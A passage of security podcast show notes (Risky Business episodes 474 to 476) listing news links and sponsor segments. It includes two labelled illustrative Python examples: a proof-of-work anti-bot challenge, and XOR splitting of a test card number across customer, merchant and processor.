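# mitigation layer puts in front of a login or search endpoint. The
# challenge layout, difficulty and key are constructed for this example;
# this is not Kasada's implementation.
import hashlib
import hmac
import os
import struct
import time

SERVER_KEY = os.urandom(32)  # per-process secret; a real service rotates it

# challenge = nonce(16) || expiry(8, big-endian) || difficulty(1) || HMAC tag(16)
CHALLENGE_LEN = 16 + 8 + 1 + 16


def leading_zero_bits(digest: bytes) -> int:
    """Number of leading zero bits in digest."""
    bits = 0
    for b in digest:
        if b == 0:
            bits += 8
            continue
        bits += 8 - b.bit_length()
        break
    return bits


def issue_challenge(difficulty: int, ttl_seconds: int = 60, now=None) -> bytes:
    """Server side, stateless: the HMAC tag stops a client minting its own
    easier or longer-lived challenges, so nothing needs storing per client."""
    now = time.time() if now is None else now
    body = os.urandom(16) + struct.pack(">QB", int(now) + ttl_seconds, difficulty)
    tag = hmac.new(SERVER_KEY, body, hashlib.sha256).digest()[:16]
    return body + tag


def solve(challenge: bytes, max_iters: int = 1 << 26) -> int:
    """Client side: find a counter so SHA-256(challenge || counter) has at
    least `difficulty` leading zero bits. Expected work is 2**difficulty hashes."""
    difficulty = challenge[24]
    for counter in range(max_iters):
        h = hashlib.sha256(challenge + counter.to_bytes(8, "big")).digest()
        if leading_zero_bits(h) >= difficulty:
            return counter
    raise RuntimeError("no solution within max_iters")


def verify(challenge: bytes, counter: int, seen: set, now=None) -> bool:
    """Server side. `seen` is the replay cache of solved challenges; a real
    service keeps it in a store that expires entries along with the TTL."""
    now = time.time() if now is None else now
    if len(challenge) != CHALLENGE_LEN:
        return False
    body, tag = challenge[:25], challenge[25:]
    expected = hmac.new(SERVER_KEY, body, hashlib.sha256).digest()[:16]
    if not hmac.compare_digest(tag, expected):
        return False  # forged or tampered challenge
    expiry, difficulty = struct.unpack(">QB", body[16:25])
    if now > expiry:
        return False  # stale: bots cannot pre-compute solutions at leisure
    if challenge in seen:
        return False  # a solved challenge is single-use
    h = hashlib.sha256(challenge + counter.to_bytes(8, "big")).digest()
    if leading_zero_bits(h) < difficulty:
        return False  # not enough work
    seen.add(challenge)
    return True


if __name__ == "__main__":
    replay_cache = set()
    ch = issue_challenge(difficulty=16)
    t0 = time.time()
    answer = solve(ch)
    print(f"solved in {time.time() - t0:.2f}s, counter={answer}")
    print("first submission accepted:", verify(ch, answer, replay_cache))
    print("replayed submission accepted:", verify(ch, answer, replay_cache))
```

Difficulty is the knob: each extra bit doubles the client's expected work while the server's verification stays at one hash, which is the asymmetry that makes this cheap to serve and expensive to scrape at scale.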

They’ve got a couple of products. One uses device fingerprinting plus a secret for authentication, but they’ve actually come up with something else that’ll be really interesting to people in the payment card processing space.

Basically they’ve come up with a way to split credit card info into a few pieces so it can be stored in a distributed way. Part of the info with the user, part with the merchant and part with the processor. It’s a better approach than tokenisation, and will drastically reduce the liability and costs that come with storing huge amounts of card data on the processor side. Oh, and they’ve solved the chargeback problem on that one too.
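A generic illustration of the split-storage idea, added here and not Haventec’s scheme: the card number is XORed into three shares held by the customer, the merchant and the processor, any one or two of which are uniformly random noise, and the recombined number is Luhn-checked before use so a missing or tampered share fails closed. The share layout and the test card number are assumptions made for the example.

```python
# Added example: n-of-n XOR secret splitting of a PAN across three holders.
# This is a generic construction, not Haventec's product; the card number
# is the standard Visa test PAN.
import os
from typing import Dict, List


def luhn_ok(pan: str) -> bool:
    """Luhn check-digit validation for a PAN of ASCII digits."""
    if not pan.isdigit():
        return False
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:          # every second digit from the right is doubled
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def split(secret: bytes, n: int = 3) -> List[bytes]:
    """n-of-n split: n-1 uniformly random shares, last = secret XOR the rest.
    Each share alone, and any n-1 together, is independent of the secret."""
    if n < 2:
        raise ValueError("need at least two shares")
    shares = [os.urandom(len(secret)) for _ in range(n - 1)]
    last = bytes(secret)
    for s in shares:
        last = xor_bytes(last, s)
    shares.append(last)
    return shares


def combine(shares: List[bytes]) -> bytes:
    """XOR all shares back together. Missing or corrupted shares produce
    garbage rather than an error, so callers must validate the result."""
    if not shares or any(len(s) != len(shares[0]) for s in shares):
        raise ValueError("shares must be non-empty and of equal length")
    out = bytes(len(shares[0]))
    for s in shares:
        out = xor_bytes(out, s)
    return out


def store_card(pan: str) -> Dict[str, bytes]:
    """Validate the PAN, then split it into shares labelled by holder.
    Nobody in this dict holds the card; no two of them do either."""
    if not luhn_ok(pan):
        raise ValueError("PAN fails Luhn check")
    customer, merchant, processor = split(pan.encode("ascii"), 3)
    return {"customer": customer, "merchant": merchant, "processor": processor}


def recover_card(shares: Dict[str, bytes]) -> str:
    """Recombine at authorisation time and validate before use."""
    raw = combine([shares["customer"], shares["merchant"], shares["processor"]])
    pan = raw.decode("ascii", errors="replace")
    if not luhn_ok(pan):
        raise ValueError("recombined PAN invalid: missing or tampered share")
    return pan


TEST_PAN = "4111111111111111"  # Visa test number; passes Luhn, charges nothing

if __name__ == "__main__":
    held = store_card(TEST_PAN)
    for holder, share in held.items():
        print(f"{holder:9s} holds {share.hex()}")
    print("recombined:", recover_card(held))
```

This is an n-of-n split, so losing any one share loses the card; a threshold scheme such as Shamir’s trades that for tolerance of a lost share at the cost of letting any two holders reconstruct on their own. Either way the recombined PAN is cardholder data again the moment it exists in memory, so the recombination point is where the usual PCI handling still applies.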

Links to the companies profiled can be found below. I hope you enjoy the show!

Show notes
Kasada | Security Redefined
Haventec | Revolutionising cyber security
Home - Australian Cyber Security Growth Network

Risky Business #476 -- Zeynep Tufekci on machine learning and disinformation

Nov 1, 2017


On this week’s show we’re chatting with Zeynep Tufekci about how machine learning accelerates the dissemination of crazy s–t, basically. Zeynep’s September TED talk titled “We’re building a dystopia just to make people click on ads” is a must watch and has been doing the rounds on infosec Twitter over the last couple of weeks. She joins us this week to talk through what we might be able to do about the tendency of online platforms to send people down pretty warped rabbit holes. That’s a fascinating chat.

This week’s show is brought to you by Senetas.

Senetas is a Melbourne-based company that develops and manufactures layer 2 encryption gear. They also operate the SureDrop secure file sharing platform and are working on a bunch of cloud crypto tech as well. Julian Fay is CTO over at Senetas and he’s along this week to talk us through the bugs Matthew Green and his colleagues found in a bunch of FIPS-certified gear from Fortinet. It’s a really, really illuminating chat. I love it when Julian’s in the sponsor chair because I always learn a lot.

Links to everything are below, and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes
Infrastructure for the ‘Bad Rabbit’ Ransomware Appears to Have Shut Down - Motherboard
Global ransomware attacks tiptoed around Russian anti-virus products
NotPetya ransomware cost Merck more than $310 million
British security minister says North Korea was behind WannaCry hack on NHS | The Independent
Worker who snuck NSA malware home had his PC backdoored, Kaspersky says | Ars Technica
Proud to keep on protecting - no matter the false allegations in the U.S. media. | Nota Bene: Eugene Kaspersky's Official Blog
Equifax Was Warned - Motherboard
China Tests the Limits of Its US Hacking Truce | WIRED
Google: Chrome is backing away from public key pinning, and here's why | ZDNet
YubiHSM 2 is here: Providing root of trust for servers and computing devices | Yubico
Francisco Partners Acquires Comodo's SSL Security Business
Google's reCaptcha Cracked Again | Threatpost
Unexplained cyberattacks sow chaos among dark web markets
The Fight Over Jordan Hamlett’s ‘Hack’ of Trump’s Tax Returns
Facebook, Google, Twitter tell Congress their platforms spread Russian-backed propaganda | Ars Technica
LSE Business Review – Blockchain and bitcoin: In search of a critique
A Guide to Attacking Domain Trusts – harmj0y
Fooling Neural Networks in the Physical World with 3D Adversarial Objects · labsix
Training
Zeynep Tufekci: We're building a dystopia just to make people click on ads | TED Talk
Attack of the week: DUHK – A Few Thoughts on Cryptographic Engineering
Senetas - a leading provider of high-assurance encryption

Risky Business #475 -- Matt Tait: US gov needs to put up or shut up on Kaspersky claims

Oct 25, 2017


On this week’s show we’re catching up with Matt Tait. Matt’s better known as @pwnallthethings on Twitter. He’s joining us this week to talk about the claims various sources have made against Kaspersky. I say sources because up to this point the only thing we’ve seen is various officials saying people shouldn’t use it. There’s been no official statement from the government or the intelligence community that actually says “don’t use it”.

And the situation is getting ridiculous. It’s as clear as mud right now, basically, so Matt will be along later to argue the US government really just needs to back the claims in an official way if they’re to be taken seriously.

This week’s show is brought to you by Cylance. This week we’re chatting to Chris Coulter, a seasoned IR professional who’s recently moved from the services arm of Cylance to the product side. We’ll be talking to Chris about IR and where EDR software is going. That one is really worth listening to. It’s easy to look at Cylance today and just see another antivirus company. People have forgotten that they basically shook up the biggest market in infosec and I think they have a solid chance of doing the same thing with a few of their upcoming releases in the EDR and UBA space. So yeah, check out that sponsor interview with Chris Coulter, coming up towards the back of the show!

Links to everything are below, and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes
'BadRabbit' ransomware spreading across Ukraine, Russia
Reaper: Calm Before the IoT Security Storm? — Krebs on Security
Cisco's Talos Intelligence Group Blog: “Cyber Conflict” Decoy Document Used In Real Cyber Conflict
How Russian Firm Might Have Siphoned Tools From the NSA
Senator questions DHS's handling of Kaspersky software ban in federal agencies
Your ID number may be public - SA data leak is worse than you think
Revealed: the real source of SA's massive data breach - TechCentral
Whois Maintainer Accidentally Makes Password Hashes Available For Download | Threatpost
Beaumont Porg, Esq. on Twitter: "Remember the Word DDE issue found by @sensepost? Copy the DDE from Word into Outlook, then email it to somebody.. No attachment -> calc."
DUHK Attack Exposes Gaps in FIPS Certification | Threatpost
New OWASP Top 10 includes Apache Struts-type vulns, XXE and poor logging
High-severity vulnerability found in SecureDrop system
China's vulnerability disclosure system twice as fast as U.S. version
The Dark Web’s Most Notorious Thief, Phishkingz, Gets Doxxed
Hackers Steal Photos From Plastic Surgeon to the Stars, Claim Trove Includes Royals
DHS Alert on Dragonfly APT Contains IOCs, Rules Likely to Trigger False Positives | Threatpost
The hacker known as "Alex" — Operation Luigi: How I hacked my friend without her noticing

Risky Business #474 -- Inside new, "invisible" Rowhammer attacks

Oct 18, 2017


On this week’s show we’re chatting with Daniel Gruss, an infosec researcher doing a postdoc in the Secure Systems group at the Graz University of Technology in Austria.

Daniel was one of the authors of a recent paper on a new Rowhammer technique. This one’s pretty clever, basically because it evades all known detection techniques by executing in an Intel SGX enclave.

We also chat with Dan Guido from Trail of Bits this week. He’s along to talk about his experience in helping to build secure software and security tools for his clients.

Of course the big news this week are the so-called “KRACK” attacks against WPA2. Adam’s done his homework on that and joins the news segment to tell you all how bad it is. We also look at the RNG bugs making life hard for smart card vendors and all the other news of the week!

Links to everything are below.

Oh, and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes
What You Should Know About the ‘KRACK’ WiFi Security Weakness — Krebs on Security
Falling through the KRACKs – A Few Thoughts on Cryptographic Engineering
Factorization Flaw in TPM Chips Makes Attacks on RSA Private Keys Feasible | Threatpost
Millions of high-security crypto keys crippled by newly discovered flaw | Ars Technica
'Hacking back' legislation is back in Congress
The World Once Laughed at North Korean Cyberpower. No More. - The New York Times
North Korean Hackers Used Hermes Ransomware to Hide Recent Bank Heist
Beaumont Porg, Esq. on Twitter: "Ukraine Intelligence Agency warning of planned large scale disk wiping attack using supply chain:"
October Price Adjustment — Steemit
Secret F-35, P-8, C-130 data stolen in Australian defence contractor hack | ZDNet
Cyberespionage Group Steps Up Campaigns Against Japanese Firms | Threatpost
Middle Eastern hacking group is using FinFisher malware to conduct international espionage
Exclusive: Microsoft responded quietly after detecting secret database hack in 2013
Equifax website borked again, this time to redirect to fake Flash update | Ars Technica
Google’s strongest security, for those who need it most
Russia Fines Telegram $14,000 for Not Giving FSB an Encryption Backdoor
Web-connected household devices to face mandatory rating over spying fears
Want to see something crazy? Open this link on your phone with WiFi turned off.
Sexual assault allegations levied against high profile security researcher and activist - The Verge
Leveraging the Analog Domain for Security (LADS)
Key Reinstallation Attacks: Forcing Nonce Reuse in WPA2
KRACK Attacks: Bypassing WPA2 against Android and Linux - YouTube
[1710.00551] Another Flip in the Wall of Rowhammer Defenses